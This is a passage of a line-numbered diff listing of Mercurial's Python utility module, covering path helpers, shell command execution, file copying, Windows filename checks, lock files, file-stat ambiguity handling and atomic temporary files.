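#
#   for chunk in increasingchunks(iter(['x'] * 100000)):
#       pass    # chunk sizes start near 1k and roughly double per chunk,
#               # capped at 64k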
957 969 Abort = error.Abort
958 970
959 971 def always(fn):
960 972 return True
961 973
962 974 def never(fn):
963 975 return False
964 976
965 977 def nogc(func):
966 978 """disable garbage collector
967 979
968 980 Python's garbage collector triggers a GC each time a certain number of
969 981 container objects (the number being defined by gc.get_threshold()) are
970 982 allocated even when marked not to be tracked by the collector. Tracking has
971 983 no effect on when GCs are triggered, only on what objects the GC looks
972 984 into. As a workaround, disable GC while building complex (huge)
973 985 containers.
974 986
975 987 This garbage collector issue has been fixed in 2.7, but it still affects
976 988 CPython's performance.
977 989 """
978 990 def wrapper(*args, **kwargs):
979 991 gcenabled = gc.isenabled()
980 992 gc.disable()
981 993 try:
982 994 return func(*args, **kwargs)
983 995 finally:
984 996 if gcenabled:
985 997 gc.enable()
986 998 return wrapper
987 999
988 1000 if pycompat.ispypy:
989 1001 # PyPy runs slower with gc disabled
990 1002 nogc = lambda x: x
991 1003
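# Illustrative sketch of nogc (the function is a placeholder):
#
#   @nogc
#   def buildbigdict(items):
#       return dict(items)  # the garbage collector stays disabled while
#                           # the container is built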
992 1004 def pathto(root, n1, n2):
993 1005 '''return the relative path from one place to another.
994 1006 root should use os.sep to separate directories
995 1007 n1 should use os.sep to separate directories
996 1008 n2 should use "/" to separate directories
997 1009 returns an os.sep-separated path.
998 1010
999 1011 If n1 is a relative path, it's assumed it's
1000 1012 relative to root.
1001 1013 n2 should always be relative to root.
1002 1014 '''
1003 1015 if not n1:
1004 1016 return localpath(n2)
1005 1017 if os.path.isabs(n1):
1006 1018 if os.path.splitdrive(root)[0] != os.path.splitdrive(n1)[0]:
1007 1019 return os.path.join(root, localpath(n2))
1008 1020 n2 = '/'.join((pconvert(root), n2))
1009 1021 a, b = splitpath(n1), n2.split('/')
1010 1022 a.reverse()
1011 1023 b.reverse()
1012 1024 while a and b and a[-1] == b[-1]:
1013 1025 a.pop()
1014 1026 b.pop()
1015 1027 b.reverse()
1016 1028 return pycompat.ossep.join((['..'] * len(a)) + b) or '.'
1017 1029
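# Illustrative sketch of pathto (POSIX-style paths; values are examples):
#
#   pathto('/repo', 'a/b', 'a/c/d')   # -> '../c/d'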
1018 1030 def mainfrozen():
1019 1031 """return True if we are a frozen executable.
1020 1032
1021 1033 The code supports py2exe (most common, Windows only) and tools/freeze
1022 1034 (portable, not much used).
1023 1035 """
1024 1036 return (safehasattr(sys, "frozen") or # new py2exe
1025 1037 safehasattr(sys, "importers") or # old py2exe
1026 1038 imp.is_frozen(u"__main__")) # tools/freeze
1027 1039
1028 1040 # the location of data files matching the source code
1029 1041 if mainfrozen() and getattr(sys, 'frozen', None) != 'macosx_app':
1030 1042 # executable version (py2exe) doesn't support __file__
1031 1043 datapath = os.path.dirname(pycompat.sysexecutable)
1032 1044 else:
1033 1045 datapath = os.path.dirname(pycompat.fsencode(__file__))
1034 1046
1035 1047 i18n.setdatapath(datapath)
1036 1048
1037 1049 _hgexecutable = None
1038 1050
1039 1051 def hgexecutable():
1040 1052 """return location of the 'hg' executable.
1041 1053
1042 1054 Defaults to $HG or 'hg' in the search path.
1043 1055 """
1044 1056 if _hgexecutable is None:
1045 1057 hg = encoding.environ.get('HG')
1046 1058 mainmod = sys.modules[pycompat.sysstr('__main__')]
1047 1059 if hg:
1048 1060 _sethgexecutable(hg)
1049 1061 elif mainfrozen():
1050 1062 if getattr(sys, 'frozen', None) == 'macosx_app':
1051 1063 # Env variable set by py2app
1052 1064 _sethgexecutable(encoding.environ['EXECUTABLEPATH'])
1053 1065 else:
1054 1066 _sethgexecutable(pycompat.sysexecutable)
1055 1067 elif (os.path.basename(
1056 1068 pycompat.fsencode(getattr(mainmod, '__file__', ''))) == 'hg'):
1057 1069 _sethgexecutable(pycompat.fsencode(mainmod.__file__))
1058 1070 else:
1059 1071 exe = findexe('hg') or os.path.basename(sys.argv[0])
1060 1072 _sethgexecutable(exe)
1061 1073 return _hgexecutable
1062 1074
1063 1075 def _sethgexecutable(path):
1064 1076 """set location of the 'hg' executable"""
1065 1077 global _hgexecutable
1066 1078 _hgexecutable = path
1067 1079
1068 1080 def _isstdout(f):
1069 1081 fileno = getattr(f, 'fileno', None)
1070 1082 return fileno and fileno() == sys.__stdout__.fileno()
1071 1083
1072 1084 def shellenviron(environ=None):
1073 1085 """return environ with optional override, useful for shelling out"""
1074 1086 def py2shell(val):
1075 1087 'convert a Python object into a string that is useful to the shell'
1076 1088 if val is None or val is False:
1077 1089 return '0'
1078 1090 if val is True:
1079 1091 return '1'
1080 1092 return str(val)
1081 1093 env = dict(encoding.environ)
1082 1094 if environ:
1083 1095 env.update((k, py2shell(v)) for k, v in environ.iteritems())
1084 1096 env['HG'] = hgexecutable()
1085 1097 return env
1086 1098
1087 1099 def system(cmd, environ=None, cwd=None, out=None):
1088 1100 '''enhanced shell command execution.
1089 1101 run with environment maybe modified, maybe in different dir.
1090 1102
1091 1103 if out is specified, it is assumed to be a file-like object that has a
1092 1104 write() method. stdout and stderr will be redirected to out.'''
1093 1105 try:
1094 1106 stdout.flush()
1095 1107 except Exception:
1096 1108 pass
1097 1109 cmd = quotecommand(cmd)
1098 1110 env = shellenviron(environ)
1099 1111 if out is None or _isstdout(out):
1100 1112 rc = subprocess.call(cmd, shell=True, close_fds=closefds,
1101 1113 env=env, cwd=cwd)
1102 1114 else:
1103 1115 proc = subprocess.Popen(cmd, shell=True, close_fds=closefds,
1104 1116 env=env, cwd=cwd, stdout=subprocess.PIPE,
1105 1117 stderr=subprocess.STDOUT)
1106 1118 for line in iter(proc.stdout.readline, ''):
1107 1119 out.write(line)
1108 1120 proc.wait()
1109 1121 rc = proc.returncode
1110 1122 if pycompat.sysplatform == 'OpenVMS' and rc & 1:
1111 1123 rc = 0
1112 1124 return rc
1113 1125
1114 1126 def checksignature(func):
1115 1127 '''wrap a function with code to check for calling errors'''
1116 1128 def check(*args, **kwargs):
1117 1129 try:
1118 1130 return func(*args, **kwargs)
1119 1131 except TypeError:
1120 1132 if len(traceback.extract_tb(sys.exc_info()[2])) == 1:
1121 1133 raise error.SignatureError
1122 1134 raise
1123 1135
1124 1136 return check
1125 1137
1126 1138 # a whitelist of known filesystems where hardlinks work reliably
1127 1139 _hardlinkfswhitelist = {
1128 1140 'btrfs',
1129 1141 'ext2',
1130 1142 'ext3',
1131 1143 'ext4',
1132 1144 'hfs',
1133 1145 'jfs',
1134 1146 'reiserfs',
1135 1147 'tmpfs',
1136 1148 'ufs',
1137 1149 'xfs',
1138 1150 'zfs',
1139 1151 }
1140 1152
1141 1153 def copyfile(src, dest, hardlink=False, copystat=False, checkambig=False):
1142 1154 '''copy a file, preserving mode and optionally other stat info like
1143 1155 atime/mtime
1144 1156
1145 1157 checkambig argument is used with filestat, and is useful only if
1146 1158 destination file is guarded by any lock (e.g. repo.lock or
1147 1159 repo.wlock).
1148 1160
1149 1161 copystat and checkambig should be exclusive.
1150 1162 '''
1151 1163 assert not (copystat and checkambig)
1152 1164 oldstat = None
1153 1165 if os.path.lexists(dest):
1154 1166 if checkambig:
1155 1167 oldstat = checkambig and filestat.frompath(dest)
1156 1168 unlink(dest)
1157 1169 if hardlink:
1158 1170 # Hardlinks are problematic on CIFS (issue4546), do not allow hardlinks
1159 1171 # unless we are confident that dest is on a whitelisted filesystem.
1160 1172 try:
1161 1173 fstype = getfstype(os.path.dirname(dest))
1162 1174 except OSError:
1163 1175 fstype = None
1164 1176 if fstype not in _hardlinkfswhitelist:
1165 1177 hardlink = False
1166 1178 if hardlink:
1167 1179 try:
1168 1180 oslink(src, dest)
1169 1181 return
1170 1182 except (IOError, OSError):
1171 1183 pass # fall back to normal copy
1172 1184 if os.path.islink(src):
1173 1185 os.symlink(os.readlink(src), dest)
1174 1186 # copytime is ignored for symlinks, but in general copytime isn't needed
1175 1187 # for them anyway
1176 1188 else:
1177 1189 try:
1178 1190 shutil.copyfile(src, dest)
1179 1191 if copystat:
1180 1192 # copystat also copies mode
1181 1193 shutil.copystat(src, dest)
1182 1194 else:
1183 1195 shutil.copymode(src, dest)
1184 1196 if oldstat and oldstat.stat:
1185 1197 newstat = filestat.frompath(dest)
1186 1198 if newstat.isambig(oldstat):
1187 1199 # stat of copied file is ambiguous to original one
1188 1200 advanced = (oldstat.stat.st_mtime + 1) & 0x7fffffff
1189 1201 os.utime(dest, (advanced, advanced))
1190 1202 except shutil.Error as inst:
1191 1203 raise Abort(str(inst))
1192 1204
1193 1205 def copyfiles(src, dst, hardlink=None, progress=lambda t, pos: None):
1194 1206 """Copy a directory tree using hardlinks if possible."""
1195 1207 num = 0
1196 1208
1197 1209 gettopic = lambda: hardlink and _('linking') or _('copying')
1198 1210
1199 1211 if os.path.isdir(src):
1200 1212 if hardlink is None:
1201 1213 hardlink = (os.stat(src).st_dev ==
1202 1214 os.stat(os.path.dirname(dst)).st_dev)
1203 1215 topic = gettopic()
1204 1216 os.mkdir(dst)
1205 1217 for name, kind in listdir(src):
1206 1218 srcname = os.path.join(src, name)
1207 1219 dstname = os.path.join(dst, name)
1208 1220 def nprog(t, pos):
1209 1221 if pos is not None:
1210 1222 return progress(t, pos + num)
1211 1223 hardlink, n = copyfiles(srcname, dstname, hardlink, progress=nprog)
1212 1224 num += n
1213 1225 else:
1214 1226 if hardlink is None:
1215 1227 hardlink = (os.stat(os.path.dirname(src)).st_dev ==
1216 1228 os.stat(os.path.dirname(dst)).st_dev)
1217 1229 topic = gettopic()
1218 1230
1219 1231 if hardlink:
1220 1232 try:
1221 1233 oslink(src, dst)
1222 1234 except (IOError, OSError):
1223 1235 hardlink = False
1224 1236 shutil.copy(src, dst)
1225 1237 else:
1226 1238 shutil.copy(src, dst)
1227 1239 num += 1
1228 1240 progress(topic, num)
1229 1241 progress(topic, None)
1230 1242
1231 1243 return hardlink, num
1232 1244
1233 1245 _winreservednames = {
1234 1246 'con', 'prn', 'aux', 'nul',
1235 1247 'com1', 'com2', 'com3', 'com4', 'com5', 'com6', 'com7', 'com8', 'com9',
1236 1248 'lpt1', 'lpt2', 'lpt3', 'lpt4', 'lpt5', 'lpt6', 'lpt7', 'lpt8', 'lpt9',
1237 1249 }
1238 1250 _winreservedchars = ':*?"<>|'
1239 1251 def checkwinfilename(path):
1240 1252 r'''Check that the base-relative path is a valid filename on Windows.
1241 1253 Returns None if the path is ok, or a UI string describing the problem.
1242 1254
1243 1255 >>> checkwinfilename(b"just/a/normal/path")
1244 1256 >>> checkwinfilename(b"foo/bar/con.xml")
1245 1257 "filename contains 'con', which is reserved on Windows"
1246 1258 >>> checkwinfilename(b"foo/con.xml/bar")
1247 1259 "filename contains 'con', which is reserved on Windows"
1248 1260 >>> checkwinfilename(b"foo/bar/xml.con")
1249 1261 >>> checkwinfilename(b"foo/bar/AUX/bla.txt")
1250 1262 "filename contains 'AUX', which is reserved on Windows"
1251 1263 >>> checkwinfilename(b"foo/bar/bla:.txt")
1252 1264 "filename contains ':', which is reserved on Windows"
1253 1265 >>> checkwinfilename(b"foo/bar/b\07la.txt")
1254 1266 "filename contains '\\x07', which is invalid on Windows"
1255 1267 >>> checkwinfilename(b"foo/bar/bla ")
1256 1268 "filename ends with ' ', which is not allowed on Windows"
1257 1269 >>> checkwinfilename(b"../bar")
1258 1270 >>> checkwinfilename(b"foo\\")
1259 1271 "filename ends with '\\', which is invalid on Windows"
1260 1272 >>> checkwinfilename(b"foo\\/bar")
1261 1273 "directory name ends with '\\', which is invalid on Windows"
1262 1274 '''
1263 1275 if path.endswith('\\'):
1264 1276 return _("filename ends with '\\', which is invalid on Windows")
1265 1277 if '\\/' in path:
1266 1278 return _("directory name ends with '\\', which is invalid on Windows")
1267 1279 for n in path.replace('\\', '/').split('/'):
1268 1280 if not n:
1269 1281 continue
1270 1282 for c in _filenamebytestr(n):
1271 1283 if c in _winreservedchars:
1272 1284 return _("filename contains '%s', which is reserved "
1273 1285 "on Windows") % c
1274 1286 if ord(c) <= 31:
1275 1287 return _("filename contains %r, which is invalid "
1276 1288 "on Windows") % c
1277 1289 base = n.split('.')[0]
1278 1290 if base and base.lower() in _winreservednames:
1279 1291 return _("filename contains '%s', which is reserved "
1280 1292 "on Windows") % base
1281 1293 t = n[-1]
1282 1294 if t in '. ' and n not in '..':
1283 1295 return _("filename ends with '%s', which is not allowed "
1284 1296 "on Windows") % t
1285 1297
1286 1298 if pycompat.osname == 'nt':
1287 1299 checkosfilename = checkwinfilename
1288 1300 timer = time.clock
1289 1301 else:
1290 1302 checkosfilename = platform.checkosfilename
1291 1303 timer = time.time
1292 1304
1293 1305 if safehasattr(time, "perf_counter"):
1294 1306 timer = time.perf_counter
1295 1307
1296 1308 def makelock(info, pathname):
1297 1309 try:
1298 1310 return os.symlink(info, pathname)
1299 1311 except OSError as why:
1300 1312 if why.errno == errno.EEXIST:
1301 1313 raise
1302 1314 except AttributeError: # no symlink in os
1303 1315 pass
1304 1316
1305 1317 ld = os.open(pathname, os.O_CREAT | os.O_WRONLY | os.O_EXCL)
1306 1318 os.write(ld, info)
1307 1319 os.close(ld)
1308 1320
1309 1321 def readlock(pathname):
1310 1322 try:
1311 1323 return os.readlink(pathname)
1312 1324 except OSError as why:
1313 1325 if why.errno not in (errno.EINVAL, errno.ENOSYS):
1314 1326 raise
1315 1327 except AttributeError: # no symlink in os
1316 1328 pass
1317 1329 fp = posixfile(pathname)
1318 1330 r = fp.read()
1319 1331 fp.close()
1320 1332 return r
1321 1333
1322 1334 def fstat(fp):
1323 1335 '''stat file object that may not have fileno method.'''
1324 1336 try:
1325 1337 return os.fstat(fp.fileno())
1326 1338 except AttributeError:
1327 1339 return os.stat(fp.name)
1328 1340
1329 1341 # File system features
1330 1342
1331 1343 def fscasesensitive(path):
1332 1344 """
1333 1345 Return true if the given path is on a case-sensitive filesystem
1334 1346
1335 1347 Requires a path (like /foo/.hg) ending with a foldable final
1336 1348 directory component.
1337 1349 """
1338 1350 s1 = os.lstat(path)
1339 1351 d, b = os.path.split(path)
1340 1352 b2 = b.upper()
1341 1353 if b == b2:
1342 1354 b2 = b.lower()
1343 1355 if b == b2:
1344 1356 return True # no evidence against case sensitivity
1345 1357 p2 = os.path.join(d, b2)
1346 1358 try:
1347 1359 s2 = os.lstat(p2)
1348 1360 if s2 == s1:
1349 1361 return False
1350 1362 return True
1351 1363 except OSError:
1352 1364 return True
1353 1365
1354 1366 try:
1355 1367 import re2
1356 1368 _re2 = None
1357 1369 except ImportError:
1358 1370 _re2 = False
1359 1371
1360 1372 class _re(object):
1361 1373 def _checkre2(self):
1362 1374 global _re2
1363 1375 try:
1364 1376 # check if match works, see issue3964
1365 1377 _re2 = bool(re2.match(r'\[([^\[]+)\]', '[ui]'))
1366 1378 except ImportError:
1367 1379 _re2 = False
1368 1380
1369 1381 def compile(self, pat, flags=0):
1370 1382 '''Compile a regular expression, using re2 if possible
1371 1383
1372 1384 For best performance, use only re2-compatible regexp features. The
1373 1385 only flags from the re module that are re2-compatible are
1374 1386 IGNORECASE and MULTILINE.'''
1375 1387 if _re2 is None:
1376 1388 self._checkre2()
1377 1389 if _re2 and (flags & ~(remod.IGNORECASE | remod.MULTILINE)) == 0:
1378 1390 if flags & remod.IGNORECASE:
1379 1391 pat = '(?i)' + pat
1380 1392 if flags & remod.MULTILINE:
1381 1393 pat = '(?m)' + pat
1382 1394 try:
1383 1395 return re2.compile(pat)
1384 1396 except re2.error:
1385 1397 pass
1386 1398 return remod.compile(pat, flags)
1387 1399
1388 1400 @propertycache
1389 1401 def escape(self):
1390 1402 '''Return the version of escape corresponding to self.compile.
1391 1403
1392 1404 This is imperfect because whether re2 or re is used for a particular
1393 1405 function depends on the flags, etc, but it's the best we can do.
1394 1406 '''
1395 1407 global _re2
1396 1408 if _re2 is None:
1397 1409 self._checkre2()
1398 1410 if _re2:
1399 1411 return re2.escape
1400 1412 else:
1401 1413 return remod.escape
1402 1414
1403 1415 re = _re()
1404 1416
1405 1417 _fspathcache = {}
1406 1418 def fspath(name, root):
1407 1419 '''Get name in the case stored in the filesystem
1408 1420
1409 1421 The name should be relative to root, and be normcase-ed for efficiency.
1410 1422
1411 1423 Note that this function is unnecessary, and should not be
1412 1424 called, for case-sensitive filesystems (simply because it's expensive).
1413 1425
1414 1426 The root should be normcase-ed, too.
1415 1427 '''
1416 1428 def _makefspathcacheentry(dir):
1417 1429 return dict((normcase(n), n) for n in os.listdir(dir))
1418 1430
1419 1431 seps = pycompat.ossep
1420 1432 if pycompat.osaltsep:
1421 1433 seps = seps + pycompat.osaltsep
1422 1434 # Protect backslashes. This gets silly very quickly.
1423 1435 seps = seps.replace('\\', '\\\\')
1424 1436 pattern = remod.compile(br'([^%s]+)|([%s]+)' % (seps, seps))
1425 1437 dir = os.path.normpath(root)
1426 1438 result = []
1427 1439 for part, sep in pattern.findall(name):
1428 1440 if sep:
1429 1441 result.append(sep)
1430 1442 continue
1431 1443
1432 1444 if dir not in _fspathcache:
1433 1445 _fspathcache[dir] = _makefspathcacheentry(dir)
1434 1446 contents = _fspathcache[dir]
1435 1447
1436 1448 found = contents.get(part)
1437 1449 if not found:
1438 1450 # retry "once per directory" per "dirstate.walk" which
1439 1451 # may take place for each patch of "hg qpush", for example
1440 1452 _fspathcache[dir] = contents = _makefspathcacheentry(dir)
1441 1453 found = contents.get(part)
1442 1454
1443 1455 result.append(found or part)
1444 1456 dir = os.path.join(dir, part)
1445 1457
1446 1458 return ''.join(result)
1447 1459
1448 1460 def getfstype(dirpath):
1449 1461 '''Get the filesystem type name from a directory (best-effort)
1450 1462
1451 1463 Returns None if we are unsure. Raises OSError on ENOENT, EPERM, etc.
1452 1464 '''
1453 1465 return getattr(osutil, 'getfstype', lambda x: None)(dirpath)
1454 1466
1455 1467 def checknlink(testfile):
1456 1468 '''check whether hardlink count reporting works properly'''
1457 1469
1458 1470 # testfile may be open, so we need a separate file for checking to
1459 1471 # work around issue2543 (or testfile may get lost on Samba shares)
1460 1472 f1, f2, fp = None, None, None
1461 1473 try:
1462 1474 fd, f1 = tempfile.mkstemp(prefix='.%s-' % os.path.basename(testfile),
1463 1475 suffix='1~', dir=os.path.dirname(testfile))
1464 1476 os.close(fd)
1465 1477 f2 = '%s2~' % f1[:-2]
1466 1478
1467 1479 oslink(f1, f2)
1468 1480 # nlinks() may behave differently for files on Windows shares if
1469 1481 # the file is open.
1470 1482 fp = posixfile(f2)
1471 1483 return nlinks(f2) > 1
1472 1484 except OSError:
1473 1485 return False
1474 1486 finally:
1475 1487 if fp is not None:
1476 1488 fp.close()
1477 1489 for f in (f1, f2):
1478 1490 try:
1479 1491 if f is not None:
1480 1492 os.unlink(f)
1481 1493 except OSError:
1482 1494 pass
1483 1495
1484 1496 def endswithsep(path):
1485 1497 '''Check path ends with os.sep or os.altsep.'''
1486 1498 return (path.endswith(pycompat.ossep)
1487 1499 or pycompat.osaltsep and path.endswith(pycompat.osaltsep))
1488 1500
1489 1501 def splitpath(path):
1490 1502 '''Split path by os.sep.
1491 1503 Note that this function does not use os.altsep because it is
1492 1504 an alternative to a simple "xxx.split(os.sep)".
1493 1505 It is recommended to use os.path.normpath() before using this
1494 1506 function if needed.'''
1495 1507 return path.split(pycompat.ossep)
1496 1508
1497 1509 def gui():
1498 1510 '''Are we running in a GUI?'''
1499 1511 if pycompat.sysplatform == 'darwin':
1500 1512 if 'SSH_CONNECTION' in encoding.environ:
1501 1513 # handle SSH access to a box where the user is logged in
1502 1514 return False
1503 1515 elif getattr(osutil, 'isgui', None):
1504 1516 # check if a CoreGraphics session is available
1505 1517 return osutil.isgui()
1506 1518 else:
1507 1519 # pure build; use a safe default
1508 1520 return True
1509 1521 else:
1510 1522 return pycompat.osname == "nt" or encoding.environ.get("DISPLAY")
1511 1523
1512 1524 def mktempcopy(name, emptyok=False, createmode=None):
1513 1525 """Create a temporary file with the same contents from name
1514 1526
1515 1527 The permission bits are copied from the original file.
1516 1528
1517 1529 If the temporary file is going to be truncated immediately, you
1518 1530 can use emptyok=True as an optimization.
1519 1531
1520 1532 Returns the name of the temporary file.
1521 1533 """
1522 1534 d, fn = os.path.split(name)
1523 1535 fd, temp = tempfile.mkstemp(prefix='.%s-' % fn, suffix='~', dir=d)
1524 1536 os.close(fd)
1525 1537 # Temporary files are created with mode 0600, which is usually not
1526 1538 # what we want. If the original file already exists, just copy
1527 1539 # its mode. Otherwise, manually obey umask.
1528 1540 copymode(name, temp, createmode)
1529 1541 if emptyok:
1530 1542 return temp
1531 1543 try:
1532 1544 try:
1533 1545 ifp = posixfile(name, "rb")
1534 1546 except IOError as inst:
1535 1547 if inst.errno == errno.ENOENT:
1536 1548 return temp
1537 1549 if not getattr(inst, 'filename', None):
1538 1550 inst.filename = name
1539 1551 raise
1540 1552 ofp = posixfile(temp, "wb")
1541 1553 for chunk in filechunkiter(ifp):
1542 1554 ofp.write(chunk)
1543 1555 ifp.close()
1544 1556 ofp.close()
1545 1557 except: # re-raises
1546 1558 try: os.unlink(temp)
1547 1559 except OSError: pass
1548 1560 raise
1549 1561 return temp
1550 1562
1551 1563 class filestat(object):
1552 1564 """help to exactly detect change of a file
1553 1565
1554 1566 The 'stat' attribute is the result of 'os.stat()' if the specified
1555 1567 'path' exists; otherwise it is None. This can avoid a preparatory
1556 1568 'exists()' check on the client side of this class.
1557 1569 """
1558 1570 def __init__(self, stat):
1559 1571 self.stat = stat
1560 1572
1561 1573 @classmethod
1562 1574 def frompath(cls, path):
1563 1575 try:
1564 1576 stat = os.stat(path)
1565 1577 except OSError as err:
1566 1578 if err.errno != errno.ENOENT:
1567 1579 raise
1568 1580 stat = None
1569 1581 return cls(stat)
1570 1582
1571 1583 @classmethod
1572 1584 def fromfp(cls, fp):
1573 1585 stat = os.fstat(fp.fileno())
1574 1586 return cls(stat)
1575 1587
1576 1588 __hash__ = object.__hash__
1577 1589
1578 1590 def __eq__(self, old):
1579 1591 try:
1580 1592 # if ambiguity between stat of new and old file is
1581 1593 # avoided, comparison of size, ctime and mtime is enough
1582 1594 # to exactly detect change of a file regardless of platform
1583 1595 return (self.stat.st_size == old.stat.st_size and
1584 1596 self.stat.st_ctime == old.stat.st_ctime and
1585 1597 self.stat.st_mtime == old.stat.st_mtime)
1586 1598 except AttributeError:
1587 1599 pass
1588 1600 try:
1589 1601 return self.stat is None and old.stat is None
1590 1602 except AttributeError:
1591 1603 return False
1592 1604
1593 1605 def isambig(self, old):
1594 1606 """Examine whether new (= self) stat is ambiguous against old one
1595 1607
1596 1608 "S[N]" below means stat of a file at N-th change:
1597 1609
1598 1610 - S[n-1].ctime < S[n].ctime: can detect change of a file
1599 1611 - S[n-1].ctime == S[n].ctime
1600 1612 - S[n-1].ctime < S[n].mtime: means natural advancing (*1)
1601 1613 - S[n-1].ctime == S[n].mtime: is ambiguous (*2)
1602 1614 - S[n-1].ctime > S[n].mtime: never occurs naturally (don't care)
1603 1615 - S[n-1].ctime > S[n].ctime: never occurs naturally (don't care)
1604 1616
1605 1617 Case (*2) above means that a file was changed twice or more within
1606 1618 the same second (= S[n-1].ctime), and comparison of timestamps
1607 1619 is ambiguous.
1608 1620
1609 1621 The basic idea to avoid such ambiguity is "advance mtime by 1 sec if
1610 1622 the timestamp is ambiguous".
1611 1623
1612 1624 But advancing mtime only in case (*2) doesn't work as
1613 1625 expected, because naturally advanced S[n].mtime in case (*1)
1614 1626 might be equal to manually advanced S[n-1 or earlier].mtime.
1615 1627
1616 1628 Therefore, all "S[n-1].ctime == S[n].ctime" cases should be
1617 1629 treated as ambiguous regardless of mtime, to avoid being misled
1618 1630 by collisions between such mtimes.
1619 1631
1620 1632 Advancing mtime "if isambig(oldstat)" ensures "S[n-1].mtime !=
1621 1633 S[n].mtime", even if size of a file isn't changed.
1622 1634 """
1623 1635 try:
1624 1636 return (self.stat.st_ctime == old.stat.st_ctime)
1625 1637 except AttributeError:
1626 1638 return False
1627 1639
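# Illustrative sketch of the ambiguous case (*2) (timestamps are example
# values, in whole seconds):
#
#   S[n-1].ctime == 10 and S[n].ctime == 10
#   -> isambig() returns True: the file changed twice within second 10,
#      so size/ctime/mtime comparison alone cannot tell the versions apart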
1628 1640 def avoidambig(self, path, old):
1629 1641 """Change file stat of specified path to avoid ambiguity
1630 1642
1631 1643 'old' should be previous filestat of 'path'.
1632 1644
1633 1645 Avoiding ambiguity is skipped if the process doesn't have
1634 1646 appropriate privileges for 'path'; in that case this
1635 1647 returns False.
1636 1648
1637 1649 Otherwise, this returns True, as "ambiguity is avoided".
1638 1650 """
1639 1651 advanced = (old.stat.st_mtime + 1) & 0x7fffffff
1640 1652 try:
1641 1653 os.utime(path, (advanced, advanced))
1642 1654 except OSError as inst:
1643 1655 if inst.errno == errno.EPERM:
1644 1656 # utime() on the file created by another user causes EPERM,
1645 1657 # if a process doesn't have appropriate privileges
1646 1658 return False
1647 1659 raise
1648 1660 return True
1649 1661
1650 1662 def __ne__(self, other):
1651 1663 return not self == other
1652 1664
1653 1665 class atomictempfile(object):
1654 1666 '''writable file object that atomically updates a file
1655 1667
1656 1668 All writes will go to a temporary copy of the original file. Call
1657 1669 close() when you are done writing, and atomictempfile will rename
1658 1670 the temporary copy to the original name, making the changes
1659 1671 visible. If the object is destroyed without being closed, all your
1660 1672 writes are discarded.
1661 1673
1662 1674 checkambig argument of constructor is used with filestat, and is
1663 1675 useful only if target file is guarded by any lock (e.g. repo.lock
1664 1676 or repo.wlock).
1665 1677 '''
1666 1678 def __init__(self, name, mode='w+b', createmode=None, checkambig=False):
1667 1679 self.__name = name # permanent name
1668 1680 self._tempname = mktempcopy(name, emptyok=('w' in mode),
1669 1681 createmode=createmode)
1670 1682 self._fp = posixfile(self._tempname, mode)
1671 1683 self._checkambig = checkambig
1672 1684
1673 1685 # delegated methods
1674 1686 self.read = self._fp.read
1675 1687 self.write = self._fp.write
1676 1688 self.seek = self._fp.seek
1677 1689 self.tell = self._fp.tell
1678 1690 self.fileno = self._fp.fileno
1679 1691
1680 1692 def close(self):
1681 1693 if not self._fp.closed:
1682 1694 self._fp.close()
1683 1695 filename = localpath(self.__name)
1684 1696 oldstat = self._checkambig and filestat.frompath(filename)
1685 1697 if oldstat and oldstat.stat:
1686 1698 rename(self._tempname, filename)
1687 1699 newstat = filestat.frompath(filename)
1688 1700 if newstat.isambig(oldstat):
1689 1701 # stat of changed file is ambiguous to original one
1690 1702 advanced = (oldstat.stat.st_mtime + 1) & 0x7fffffff
1691 1703 os.utime(filename, (advanced, advanced))
1692 1704 else:
1693 1705 rename(self._tempname, filename)
1694 1706
1695 1707 def discard(self):
1696 1708 if not self._fp.closed:
1697 1709 try:
1698 1710 os.unlink(self._tempname)
1699 1711 except OSError:
1700 1712 pass
1701 1713 self._fp.close()
1702 1714
1703 1715 def __del__(self):
1704 1716 if safehasattr(self, '_fp'): # constructor actually did something
1705 1717 self.discard()
1706 1718
1707 1719 def __enter__(self):
1708 1720 return self
1709 1721
1710 1722 def __exit__(self, exctype, excvalue, traceback):
1711 1723 if exctype is not None:
1712 1724 self.discard()
1713 1725 else:
1714 1726 self.close()
1715 1727
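# A minimal usage sketch of atomictempfile (hypothetical filename, not part
# of the original module). On a clean exit from the with-block the temporary
# copy is renamed over the target, so readers never observe a partial write;
# on an exception the temporary copy is discarded and the target is untouched:
#
#   with atomictempfile('somefile.txt') as fp:
#       fp.write('all or nothing')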
1716 1728 def unlinkpath(f, ignoremissing=False):
1717 1729 """unlink and remove the directory if it is empty"""
1718 1730 if ignoremissing:
1719 1731 tryunlink(f)
1720 1732 else:
1721 1733 unlink(f)
1722 1734 # try removing directories that might now be empty
1723 1735 try:
1724 1736 removedirs(os.path.dirname(f))
1725 1737 except OSError:
1726 1738 pass
1727 1739
1728 1740 def tryunlink(f):
1729 1741 """Attempt to remove a file, ignoring ENOENT errors."""
1730 1742 try:
1731 1743 unlink(f)
1732 1744 except OSError as e:
1733 1745 if e.errno != errno.ENOENT:
1734 1746 raise
1735 1747
1736 1748 def makedirs(name, mode=None, notindexed=False):
1737 1749 """recursive directory creation with parent mode inheritance
1738 1750
1739 1751 Newly created directories are marked as "not to be indexed by
1740 1752 the content indexing service", if ``notindexed`` is specified
1741 1753 for "write" mode access.
1742 1754 """
1743 1755 try:
1744 1756 makedir(name, notindexed)
1745 1757 except OSError as err:
1746 1758 if err.errno == errno.EEXIST:
1747 1759 return
1748 1760 if err.errno != errno.ENOENT or not name:
1749 1761 raise
1750 1762 parent = os.path.dirname(os.path.abspath(name))
1751 1763 if parent == name:
1752 1764 raise
1753 1765 makedirs(parent, mode, notindexed)
1754 1766 try:
1755 1767 makedir(name, notindexed)
1756 1768 except OSError as err:
1757 1769 # Catch EEXIST to handle races
1758 1770 if err.errno == errno.EEXIST:
1759 1771 return
1760 1772 raise
1761 1773 if mode is not None:
1762 1774 os.chmod(name, mode)
1763 1775
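# Illustrative sketch (hypothetical paths): makedirs creates missing parents
# recursively and swallows EEXIST, so calling it twice is harmless.
#
#   makedirs('a/b/c')   # creates 'a', 'a/b' and 'a/b/c' as needed
#   makedirs('a/b/c')   # already exists: returns without raising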
1764 1776 def readfile(path):
1765 1777 with open(path, 'rb') as fp:
1766 1778 return fp.read()
1767 1779
1768 1780 def writefile(path, text):
1769 1781 with open(path, 'wb') as fp:
1770 1782 fp.write(text)
1771 1783
1772 1784 def appendfile(path, text):
1773 1785 with open(path, 'ab') as fp:
1774 1786 fp.write(text)
1775 1787
1776 1788 class chunkbuffer(object):
1777 1789 """Allow arbitrary sized chunks of data to be efficiently read from an
1778 1790 iterator over chunks of arbitrary size."""
1779 1791
1780 1792 def __init__(self, in_iter):
1781 1793 """in_iter is the iterator that's iterating over the input chunks."""
1782 1794 def splitbig(chunks):
